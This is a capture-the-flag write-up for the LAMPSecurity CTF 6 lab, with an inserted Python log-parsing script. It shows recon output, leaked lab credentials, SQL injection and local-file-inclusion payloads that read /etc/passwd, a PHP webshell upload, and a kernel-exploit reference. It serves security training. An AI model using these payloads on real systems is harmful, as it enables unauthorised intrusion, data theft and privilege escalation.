Write-up of the LAMPSecurity: CTF 6 challenge by @killr00t, winner of the challenge
SOLUTION WRITE-UP: LAMPSecurity CTF 6
Tool: WhatWeb
Result:
http://192.168.1.72 [200] Meta-Author[Justin C. Klein Keane], HTTPServer[CentOS][Apache/2.2.3 (CentOS)], Apache[2.2.3], IP[192.168.1.72], PHP[5.2.6], X-Powered-By[PHP/5.2.6], Cookies[PHPSESSID], Title[CTF 6 - Widgets Inc.], Email[[email protected], [email protected], [email protected], [email protected]], Country[RESERVED][ZZ]
Tool: nikto
Result:
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Number of sections in the version string differ from those in the database, the server reports: apache/2.2.3 while the database has: 2.2.14. This may cause false positives.
+ Retrieved X-Powered-By header: PHP/5.2.6
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /sql/: Directory indexing is enabled: /sql/
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons
+ OSVDB-3268: /manual/images/: Directory indexing is enabled: /manual/images
+ OSVDB-3268: /docs/: Directory indexing is enabled: /docs
+ OSVDB-3233: /icons/README: Apache default file found.
+ 3818 items checked: 16 item(s) reported on remote host
Directories
Tool: DirBuster
Result:
• /cgi-bin
• /files
• /templates
• /icons
• /docs
• /mail
• /js

Tool: nikto
Result:
• /files
• /lib
• /mail
• /phpmyadmin
• /sql
• /manual
• /docs
• /icons
Files of Interest
• /sql/db.sql
INSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass');
User => admin
Pass => 25e4ee4e9229397b6b17776bfceaf8e7 => adminpass
DB => cms
Table => user
• /docs/code_backup.tgz
• /conf/config.ini
• /logs/log.log
2009-06-28 13:06:09 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1%20from%20dual
2009-06-28 13:06:09 Problem with event select: . The used SELECT statements have a different number of columns
2009-06-28 13:06:28 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:43 172.16.61.132 called id=4%20UNION%20select%20version,1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:43 Problem with event select: . Unknown column 'version' in 'field list'
2009-06-28 13:06:52 172.16.61.132 called id=4%20UNION%20select%20version(),1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:13 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,7%20from%20dual
2009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1
2009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1
2009-06-28 13:06:30 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,version()%20from%20dual
2009-06-28 13:06:30 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,version() from dual' at line 1
Note: the log in this backup shows that vulnerabilities had already been found on this host (the id parameter was being probed with UNION SELECT, first with 6 columns, then with 7). Reviewing those requests is worthwhile: they tell you where the application is injectable and how many columns the query returns, which speeds up escalation.
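To draw the same conclusion from the log mechanically, here is an added example (my code, not part of the original write-up or of the CTF) that parses lines in the format of /logs/log.log shown above, pairs each injected id= request with the error logged right after it, and infers how many columns the UNION needed. The sample lines are constructed from the excerpt above; the regular expressions and the "different number of columns" marker are assumptions about the log format.

```python
import re
from urllib.parse import unquote

# Constructed sample in the format of /logs/log.log (taken from the excerpt above).
SAMPLE_LOG = """\
2009-06-28 13:06:09 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1%20from%20dual
2009-06-28 13:06:09 Problem with event select: . The used SELECT statements have a different number of columns
2009-06-28 13:06:28 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:43 172.16.61.132 called id=4%20UNION%20select%20version,1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:43 Problem with event select: . Unknown column 'version' in 'field list'
2009-06-28 13:06:52 172.16.61.132 called id=4%20UNION%20select%20version(),1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 1
"""

# Assumed line shapes: "<date> <time> <ip> called id=<payload>" and "<date> <time> Problem with <message>".
REQUEST_RE = re.compile(r"^(\S+ \S+) (\d+\.\d+\.\d+\.\d+) called id=(.*)$")
ERROR_RE = re.compile(r"^(\S+ \S+) Problem with (.*)$")
UNION_RE = re.compile(r"union\s+select\s+(.*?)\s+from\b", re.IGNORECASE | re.DOTALL)
COLUMN_MISMATCH = "different number of columns"   # MySQL's UNION arity error


def parse_log(text):
    """Turn raw log lines into (kind, timestamp, ip, detail) tuples; unknown lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            entries.append(("request", m.group(1), m.group(2), unquote(m.group(3))))
            continue
        m = ERROR_RE.match(line)
        if m:
            entries.append(("error", m.group(1), None, m.group(2)))
    return entries


def union_column_count(payload):
    """Number of select-list items in a UNION SELECT payload, or None if there is no UNION."""
    m = UNION_RE.search(payload)
    if not m:
        return None
    depth, count = 0, 1
    for ch in m.group(1):          # count commas at nesting depth 0 so version() is one item
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            count += 1
    return count


def pair_attempts(entries):
    """Attach to each UNION probe the first error the application logged after it."""
    attempts = []
    for i, entry in enumerate(entries):
        if entry[0] != "request":
            continue
        cols = union_column_count(entry[3])
        if cols is None:
            continue
        err = next((e[3] for e in entries[i + 1:i + 3] if e[0] == "error"), "")
        attempts.append({"ip": entry[2], "payload": entry[3], "columns": cols,
                         "column_mismatch": COLUMN_MISMATCH in err})
    return attempts


def infer_column_count(text):
    """Smallest column count whose probe did not trigger the UNION arity error."""
    good = [a["columns"] for a in pair_attempts(parse_log(text)) if not a["column_mismatch"]]
    return min(good) if good else None


if __name__ == "__main__":
    for a in pair_attempts(parse_log(SAMPLE_LOG)):
        print(a["columns"], "mismatch" if a["column_mismatch"] else "ok   ", a["payload"])
    print("inferred columns:", infer_column_count(SAMPLE_LOG))
```

The 6-column probe draws the arity error from the event SELECT; the 7-column probes no longer do, and the errors that remain come from a different statement (the "log hit update" that also receives the raw id) and from the bad column name version, so the original SELECT returns 7 columns.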
Vulnerability Identification (code_backup.tgz)
File: /actions/login.php
Code:
-----------------------------------------------------------------------------------------------------------------------------------------------
if (isset($_POST['username']) && isset($_POST['password'])) {
    $sql = "select user_id from user where user_username = '" . $_POST['username'] . "'";
    $query = mysql_query($sql) or die("Query error with $sql: " . mysql_error());
    if ($query && mysql_num_rows($query) > 0) {
        //user exists
        $uname = mysql_fetch_object($query);
        $sql = "select * from user where user_id = " . $uname->user_id .
               " AND user_password = md5('" . $_POST['password'] . "')";
        $query = mysql_query($sql)
            or $log->append("Query error in login $sql<hr/> " . mysql_error());
        $retval = array();
        if (! $query) {
            //no return value
        }
        else {
            $retval = mysql_fetch_object($query);
        }
    }
    if (isset($retval->user_id)) {
        setcookie("logged_in", 1, time()+3600);
        setcookie("user_id", $retval->user_id, time()+3600);
        setcookie("hash", $retval->user_password, time()+3600);
        $logged_in = 1;
    }
}
if ($logged_in) include_once('templates/logged_in.tpl');
else include_once('templates/'.$_GET['action'].'.tpl');
Vulnerability: SQL Injection
Vulnerable variables: username, password
Description: neither parameter is filtered or escaped before being concatenated into a query. The code first runs a lookup on username and, only if a row comes back, a second query on password, so both are injectable: username lands inside a quoted string in the first SELECT, and password inside the md5('...') call of the second. The first query's failure path is die() with the full SQL and mysql_error(), so syntax errors are echoed back to the browser, which gives an error-based channel for pulling data out of the database. A password such as ') OR 1=1 -- (with the trailing space) makes the second query's WHERE clause true and logs in as the user found by the first query.
Vulnerability: Local File Include
Vulnerable variable: action
Description: $_GET['action'] is concatenated into include_once('templates/'.$_GET['action'].'.tpl') without validation, so a traversal sequence reaches files outside the web root. The %00 cuts the path off before the '.tpl' suffix; that works on this PHP 5.2.6 (null-byte truncation in include paths was removed in PHP 5.3.4) as long as magic_quotes_gpc is off, since magic quotes would escape the NUL byte.
Exploit: /actions/login.php?action=../../../../../etc/passwd%00
File: /actions/add_event.php
Code:
if (! $logged_in) header("Location:index.php");
$log->append("Adding file!") or die("Couldn't append to log for some reason!");
if (isset($_POST['title'])) {
    if (isset($_FILES['upload'])) {
        $uploaddir = 'files/';
        $uploadfile = $uploaddir . basename($_FILES['upload']['name']);
        if (! move_uploaded_file($_FILES['upload']['tmp_name'], $uploadfile)) {
            $log->append("Log upload problem with file array: $_FILES");
            $log->append("Upload file name: $uploadfile");
            $log->append("Upload file tmp name: " . $_FILES['upload']['tmp_name']);
        }
    }
    $sql = "insert into event set event_title='" . $_POST['title'] . "',
            event_body='" . addslashes($_POST['body']) . "',
            event_file='" . $uploadfile . "',
            user_id = " . $_COOKIE['user_id'];
    mysql_query($sql) or $log->append("Problem with insert. " . mysql_error());
}
include_once('templates/'.$_GET['action'].'.tpl');
Vulnerability: Local File Include
Vulnerable variable: action
Description: the same unvalidated include of templates/<action>.tpl as in login.php, so the same traversal and null-byte trick applies.
Exploit: /actions/add_event.php?action=../../../../../etc/passwd%00
Vulnerability: File upload
Description: the handler calls move_uploaded_file() on basename($_FILES['upload']['name']) into files/ without checking the extension or the content, so a .php file lands in a web-served directory with its name intact and can be used to execute operating-system commands. Two further defects are visible in the same file: the header("Location:index.php") redirect for visitors who are not logged in is not followed by exit(), so the upload code still executes for an unauthenticated request; and event_title and $_COOKIE['user_id'] go into the INSERT unescaped (only body gets addslashes()), which is another injection point.
Note: all the files have coding problems; I will only use this last one to upload the shell directly and escalate privileges.
Exploitation and Privilege Escalation
File: /actions/add_event.php
Exploit: file upload
Description: pick a PHP shell and add it as an event after logging in to the CMS
• LOG IN TO THE CMS
User: admin
Pass: adminpass
Note: these credentials were already recovered from the SQL file found earlier.
• ADD EVENTS: this section has a menu whose vulnerable code we have already seen, which lets us upload the shell directly
This gives us a series of local exploits we can use; I will use http://www.exploit-db.com/exploits/8478/. It is the only one that worked for me; there are several for that kernel version but, as I say, only this one worked for me.